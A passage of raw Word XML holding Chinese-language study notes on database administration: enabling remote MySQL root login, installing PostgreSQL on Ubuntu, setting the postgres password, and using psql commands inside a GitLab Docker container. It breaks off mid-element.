    <w:p w14:paraId="53AE6F9E" w14:textId="77777777" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5BB2B2" w14:textId="51E586CE" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他增删查改操作和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中一致。例如查找：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF28BC4" w14:textId="6BE330F3" w:rsidR="004C36E8" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>select * from student where ID=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B669E" w14:textId="201C959D" w:rsidR="004C36E8" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A47630" w14:textId="77777777" w:rsidR="004C36E8" w:rsidRPr="00A447A2" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DE8A4F" w14:textId="05DAAEE4" w:rsidR="005451E6" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc159779559"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许外部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="0019390D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（默认只允许</w:t>
      </w:r>
      <w:r w:rsidR="0019390D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidR="0019390D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="34E5F7D7" w14:textId="77777777" w:rsidR="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F4DD9D" w14:textId="367FF409" w:rsidR="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009F77C7">
        <w:t>use mysql;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F30958" w14:textId="7500679C" w:rsidR="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009F77C7">
        <w:t>select user,host from user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A6AF2" w14:textId="0B8BEF47" w:rsidR="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009F77C7">
        <w:t>update user set host='%' where user='root';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E91C50" w14:textId="77777777" w:rsidR="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAB7B8D" w14:textId="77777777" w:rsidR="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAC0A09" w14:textId="77777777" w:rsidR="009F77C7" w:rsidRPr="009F77C7" w:rsidRDefault="009F77C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1DD214" w14:textId="77777777" w:rsidR="005451E6" w:rsidRDefault="005451E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E7FA40" w14:textId="43783826" w:rsidR="00E324BC" w:rsidRDefault="00E324BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760EEDE8" w14:textId="1FFD5A01" w:rsidR="00E324BC" w:rsidRDefault="00E324BC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc159779560"/>
      <w:r>
        <w:t>postgreSQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="1A5FC586" w14:textId="3A1A2DFD" w:rsidR="00E324BC" w:rsidRDefault="00E324BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF455EE" w14:textId="4C9B0F94" w:rsidR="0068636D" w:rsidRPr="0068636D" w:rsidRDefault="0068636D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:t>greSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
      <w:r w:rsidR="00FE44B9" w:rsidRPr="00FE44B9">
        <w:t>https://www.postgresql.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69518E62" w14:textId="77777777" w:rsidR="0068636D" w:rsidRDefault="0068636D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196307EC" w14:textId="02BAFB8F" w:rsidR="00E324BC" w:rsidRDefault="00E05E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A515A2A" w14:textId="2C56ECD5" w:rsidR="007257BF" w:rsidRDefault="007257BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>中文文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007257BF">
        <w:t>https://docs.gitcode.net/pg/guide/app-psql.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5288B3" w14:textId="6AAD93F3" w:rsidR="00E05E26" w:rsidRDefault="00E05E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05E26">
        <w:t>https://www.runoob.com/postgresql/linux-install-postgresql.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75884380" w14:textId="2F1235D7" w:rsidR="00E05E26" w:rsidRDefault="005D09E4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005D09E4">
        <w:t>https://blog.csdn.net/cnwyt/article/details/103018946</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A8E205" w14:textId="40BA795E" w:rsidR="00E324BC" w:rsidRDefault="00E324BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCEE3B7" w14:textId="59930918" w:rsidR="00FC0F9A" w:rsidRDefault="00FC0F9A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc159779561"/>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="5A6B1860" w14:textId="77777777" w:rsidR="00FC0F9A" w:rsidRDefault="00FC0F9A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="398D36D9" w14:textId="5A108573" w:rsidR="00E324BC" w:rsidRPr="00A106D5" w:rsidRDefault="00EF7C1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认没有安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07139D18" w14:textId="271CF8CB" w:rsidR="00433FFF" w:rsidRPr="00A106D5" w:rsidRDefault="00433FFF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A106D5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo apt-get install postgresql postgresql-client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE30850" w14:textId="5BF5846E" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F78EC6A" w14:textId="77777777" w:rsidR="00BD3A9D" w:rsidRDefault="00077392" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装后会默认生成一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据库和一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据库用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6454D" w14:textId="0F53733F" w:rsidR="004775A8" w:rsidRDefault="00077392" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时还生成了一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5D016" w14:textId="18CCA4C0" w:rsidR="00365A55" w:rsidRDefault="00365A55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4613E999" w14:textId="2D9FD867" w:rsidR="005F6C0B" w:rsidRDefault="005F6C0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接使用命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:t>psql`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，</w:t>
      </w:r>
      <w:r w:rsidR="008333BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示没有</w:t>
      </w:r>
      <w:r w:rsidR="008333BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="008333BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户，</w:t>
      </w:r>
      <w:r w:rsidR="008333BB" w:rsidRPr="004370F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r w:rsidR="008333BB" w:rsidRPr="004370F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r w:rsidR="008333BB" w:rsidRPr="004370F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>会识别</w:t>
      </w:r>
      <w:r w:rsidR="008333BB" w:rsidRPr="004370F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="008333BB" w:rsidRPr="004370F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>本地用户</w:t>
      </w:r>
      <w:r w:rsidR="008333BB" w:rsidRPr="004370F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>做验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833070D" w14:textId="77777777" w:rsidR="005F6C0B" w:rsidRDefault="005F6C0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB64E89" w14:textId="38BE34CB" w:rsidR="00980267" w:rsidRDefault="00B7612B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7612B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完毕后，系统会创建一个数据库超级用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7612B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7612B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，密码为空。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4A1D9" w14:textId="77777777" w:rsidR="00980267" w:rsidRDefault="00980267" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD91B89" w14:textId="018F89A6" w:rsidR="00365A55" w:rsidRDefault="00365A55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres </w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库用户密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0263B3" w14:textId="7A1355EF" w:rsidR="004775A8" w:rsidRDefault="00365A55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6A4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su </w:t>
      </w:r>
      <w:r w:rsidR="00A63F8F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6A4F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216EFEDC" w14:textId="49F9C386" w:rsidR="00A63F8F" w:rsidRDefault="00A63F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后直接敲入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3C0B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2C72BD" w14:textId="2A6134F9" w:rsidR="004775A8" w:rsidRDefault="00365A55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6A4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\password</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，为</w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres </w:t>
      </w:r>
      <w:r w:rsidRPr="00365A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户设置一个密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCFAAA8" w14:textId="45D2ECFC" w:rsidR="004775A8" w:rsidRDefault="004775A8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FBCB95" w14:textId="61BDD5D0" w:rsidR="004775A8" w:rsidRDefault="004775A8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1DA62F" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727D2593" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>docker exec -it 77ac401739f5 bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461763B3" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>su - gitlab-psql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06344615" w14:textId="3821863B" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>psql -h /var/opt/gitlab/postgresql -d gitlabhq_production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E71460F" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A996A4A" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\h    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看帮助命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F859A" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>\l     //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05545E" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\dt   //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看多表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A825172" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\d users    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看单表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B5E33" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\di    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看索引</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD9B7EC" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\q    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71BA12" w14:textId="77777777" w:rsidR="00A03287" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC07FBA" w14:textId="2F1D7F4F" w:rsidR="004775A8" w:rsidRDefault="00A03287" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\c gitlabhq_production // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A9CD9F" w14:textId="22421106" w:rsidR="00A23AE1" w:rsidRDefault="00A23AE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CB62D9" w14:textId="77777777" w:rsidR="00EE457B" w:rsidRDefault="00EE457B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788BF743" w14:textId="218CF623" w:rsidR="00EE457B" w:rsidRDefault="00EE457B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> testdb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的所有权限都赋予</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> db_user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库用户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> db_user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能登录控制台，没有数据库操作权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99C0FA" w14:textId="77777777" w:rsidR="00EE457B" w:rsidRDefault="00EE457B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
